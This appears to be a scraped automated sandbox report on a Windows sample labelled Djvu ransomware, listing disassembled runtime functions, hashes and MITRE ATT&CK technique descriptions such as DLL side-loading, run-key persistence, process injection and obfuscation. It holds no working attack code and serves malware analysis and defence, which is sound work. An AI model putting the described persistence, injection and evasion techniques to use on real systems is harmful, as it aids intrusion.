__CxxThrowException@8.LIBCMT ref: 0222FC62
std::regex_error::regex_error.LIBCPMT ref: 0222FC74

Part of subcall function 0222F914: std::exception::exception.LIBCMT ref: 0222F92E

__CxxThrowException@8.LIBCMT ref: 0222FC82
std::exception::exception.LIBCMT ref: 0222FC9B
__CxxThrowException@8.LIBCMT ref: 0222FCB0

Strings

leM, xrefs: 0222FCA8

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
String ID: leM
API String ID: 3569886845-2926266777
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: 77bff90c2f2e5714d76928a0b9d4841b5f4d7c93bb6bb85915404d416227f48a
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: E111E979C0030DBBCF04FFE5D855CEEBBBDAA14344B408566AE1897648EB74A3588F94

Function 021EF010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 021EF01F

Part of subcall function 02201602: __FF_MSGBANNER.LIBCMT ref: 02201619
Part of subcall function 02201602: __NMSG_WRITE.LIBCMT ref: 02201620

_malloc.LIBCMT ref: 021EF02B
_wprintf.LIBCMT ref: 021EF03E
_free.LIBCMT ref: 021EF044
_free.LIBCMT ref: 021EF065
_malloc.LIBCMT ref: 021EF06D
_sprintf.LIBCMT ref: 021EF0C0
_wprintf.LIBCMT ref: 021EF0D2
_wprintf.LIBCMT ref: 021EF0DC
_free.LIBCMT ref: 021EF0E5

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$_sprintf
String ID:
API String ID: 3721157643-0
Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction ID: 62323c2820b37f46f4f8175df8560c3120ef541ece2f6023bdcafca74a03793e
Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
Instruction Fuzzy Hash: 651154B29106506AC722A2F40C55FFF3BED8F46302F0401AAFE8DE11C1EB185A119BB1

Function 021F1960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 021F19C6
__CxxThrowException@8.LIBCMT ref: 021F19F1
__CxxThrowException@8.LIBCMT ref: 021F1A1A
__CxxThrowException@8.LIBCMT ref: 021F1A4B
_memset.LIBCMT ref: 021F1A6A
__CxxThrowException@8.LIBCMT ref: 021F1A90
_malloc.LIBCMT ref: 021F1AA0
_memset.LIBCMT ref: 021F1AAB
_sprintf.LIBCMT ref: 021F1ACE

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset$_malloc_sprintf
String ID:
API String ID: 65388428-0
Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction ID: 11755d5e45a658c90d1c8cab0f79ef0297a504c28769860761a6d46e9ffd4c4d
Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
Instruction Fuzzy Hash: 2D514971D40209FBEB11DBE5DC86FAFBBB9FB04744F100025FA09B6180EB746A018BA5

Function 021EF210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 021EF284
__CxxThrowException@8.LIBCMT ref: 021EF2AF
__CxxThrowException@8.LIBCMT ref: 021EF2DE
__CxxThrowException@8.LIBCMT ref: 021EF30F
_memset.LIBCMT ref: 021EF32E
__CxxThrowException@8.LIBCMT ref: 021EF354
_sprintf.LIBCMT ref: 021EF373

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: f260aa5502567350601d509099d6982fb820055e022b4b1c053be4f1d318979d
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 7E513F71D40209EAEF11DFE1DC46FEFBBB9AB04704F104129F916B6180D775AA05CBA5

Function 021EF440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 021EF4B7
__CxxThrowException@8.LIBCMT ref: 021EF4E2
__CxxThrowException@8.LIBCMT ref: 021EF504
__CxxThrowException@8.LIBCMT ref: 021EF535
_memset.LIBCMT ref: 021EF554
__CxxThrowException@8.LIBCMT ref: 021EF57A
_sprintf.LIBCMT ref: 021EF594

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throw$_memset_sprintf
String ID:
API String ID: 217217746-0
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 80daf1be3251731c064ab7eb189366d1c07f1acca17f2a6f744deb5f660e5c7b
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: 7C514071D40249AADF21DFE1DC45FEFBBB9EF14704F104129FA16B6180E774AA068BA4

Function 0222208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 022220C6
__invoke_watson.LIBCMT ref: 02222120
_strlen.LIBCMT ref: 022220D4

Part of subcall function 02205BA8: __getptd_noexit.LIBCMT ref: 02205BA8

_strnlen.LIBCMT ref: 0222215F
__lock.LIBCMT ref: 02222170
__getenv_helper_nolock.LIBCMT ref: 0222217B

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: f1f2e7b6bf48de0555e525f91356899842675658b82ad3f6ff1020886001b396
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: 9E31F472930332FADB216AE48C40B6E3795AF15B24F104215EE04EB2DDDB778648CAA1

Function 021FA810 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 021FA858
_memset.LIBCMT ref: 021FA869
_memset.LIBCMT ref: 021FA87A

Strings

p2Q, xrefs: 021FA882
p2Q, xrefs: 021FA839

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q$p2Q
API String ID: 2102423945-3078105762
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: 799e25064d7c509c7d4f5837477955cfcf8adce193352741c144d4d13266043f
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: 14F0ED78698751A5F7217790BC66B857E917B31B09F104088E1182E2E5D3FD238CA79A

Function 021F2670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 021F26DB
_memset.LIBCMT ref: 021F2A30
_memset.LIBCMT ref: 021F2AC0

Strings

D, xrefs: 021F2AC8

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID: D
API String ID: 2102423945-2746444292
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: 301de54810c31be24a59d716ee03dbbba84d3442b61bf6bf11d4808cc8219667
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 46E15C71D4021AEACF64DFA0CD89FEEB7B8BF04304F14416AEA19A7190EB746A45CF54

Function 021ED8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 021ED8EA

Strings

, xrefs: 021EDADB
(, xrefs: 021EDAE9
$, xrefs: 021EDAE2

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID: $$$(
API String ID: 2102423945-3551151888
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 4f98817a1097b19a137fbe0eebe44e50e69461f39cc32abeea6d558e2e64ee05
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 5591CD70C40248DAEF20DFA0DC59BEEBBB9AF05304F244169D516772C1DBB65A48CFA5

Function 0222FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0222FBF1

Part of subcall function 0221169C: std::exception::_Copy_str.LIBCMT ref: 022116B5

__CxxThrowException@8.LIBCMT ref: 0222FC06

Strings

TeM, xrefs: 0222FBFE
TeM, xrefs: 0222FBFB, 0222FBE7

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
String ID: TeM$TeM
API String ID: 3662862379-3870166017
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: c3618d79b97655c457622e59adfd07abc0706e08db108d7202a5bb1e62af9fda
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: F8D06775C0034CBBCB04EFA5D459CDDBBB9AA14344B40C466AA1897249EA74A3598FD4

Function 021ED0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 0220197D: __wfsopen.LIBCMT ref: 02201988

_fgetws.LIBCMT ref: 021ED15C

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: __wfsopen_fgetws
String ID:
API String ID: 853134316-0
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: b34ae6501aef8d63486c80017912864abef5ea7e35e65642a3bda1bad6528d20
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: 4B91C5B1D4071ADBCF20DFA4DC857AFB7B9BF04304F140529E816A7281E775AA14CB95

Function 021ED540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 021ED77E
_malloc.LIBCMT ref: 021ED7B2
_malloc.LIBCMT ref: 021ED7C1
_fprintf.LIBCMT ref: 021ED815

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:
API String ID: 1783060780-0
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: 35e9bd96cfcc1a57e4aa69fb27b1c2c9cce4f7a77bfa1c6d21e61caadc416628
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: D3A191B1C00248EBEF11EFE4DC59BDEBB76AF14308F140128D51676291D7BA5A48CFA6

Function 02202AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 02202B2E
__read_nolock.LIBCMT ref: 02202BFE
__filbuf.LIBCMT ref: 02202C21
_memset.LIBCMT ref: 02202C65

Part of subcall function 02205BA8: __getptd_noexit.LIBCMT ref: 02205BA8

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction ID: a390c4426557989c4d9801535889f15b720ef53e03b6f94ee2af08b8054b1c30
Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction Fuzzy Hash: 24519370A20306DBDB258FF988C866EB7B5BF40324F14872AEC35962DAD7B09951CF40

Function 02221359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0222137D

Part of subcall function 02221A9D: __fltout2.LIBCMT ref: 02221AC6

__cftog_l.LIBCMT ref: 022213A3
__cftoe_l.LIBCMT ref: 022213D5

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 039ca46544a0acc8243a4e4f31dbd5c4d9169bd924f0fbd0238b5eba7d0d5c3f
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: 4201663202025ABBCF125EC4CE01CEE3F63BB18344B488414FA185882AD337C5B6AB81

Function 022A7A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 022A7A4B

Part of subcall function 022A8140: ___BuildCatchObjectHelper.LIBCMT ref: 022A8172
Part of subcall function 022A8140: ___AdjustPointer.LIBCMT ref: 022A8189

_UnwindNestedFrames.LIBCMT ref: 022A7A62
___FrameUnwindToState.LIBCMT ref: 022A7A74
CallCatchBlock.LIBCMT ref: 022A7A98

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: aaae15195bfdaa13cc038a8a05ac384f7778c9835728a41c60797060b17584fc
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: C8011732010209BBCF12AF95CC00EEEBBAAEF48754F148014F91865525C336E961DFA4

Function 021FC480 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 021FC584
_free.LIBCMT ref: 021FC677

Part of subcall function 021F2670: _memset.LIBCMT ref: 021F26DB

Strings

`2Q, xrefs: 021FC4F4, 021FC769, 021FC89B, 021FC8DD

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: _free_malloc_memset
String ID: `2Q
API String ID: 2338540524-1183459105
Opcode ID: 9241af2161bfbd6359edb443d6d7de0d31d9a2294c1e79904c9bbb7ab79be988
Instruction ID: daca6206bb3984765dd28d03b53aec90cefdea4521d804f73dc4e0e41f193c5e
Opcode Fuzzy Hash: 9241af2161bfbd6359edb443d6d7de0d31d9a2294c1e79904c9bbb7ab79be988
Instruction Fuzzy Hash: F1C10271548384EFDB60DF24D848B5ABBE1FF85314F04492EE9A8833A1DB719408DF96

Function 02232040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\, xrefs: 022320CC
x86)=C:\Program Files (x86), xrefs: 022320C7, 022320E9

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\$x86)=C:\Program Files (x86)
API String ID: 0-870515742
Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction ID: e4948795b45413ef2bd7d74e98ba0e1fe589bf1e0754ceaaaadfcc17d69e7d70
Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction Fuzzy Hash: BA11D3F1F90700B7FA2237946C83FA52452D720B44F94002AFB882D3DAE7FA54A4865A

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Djvu

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

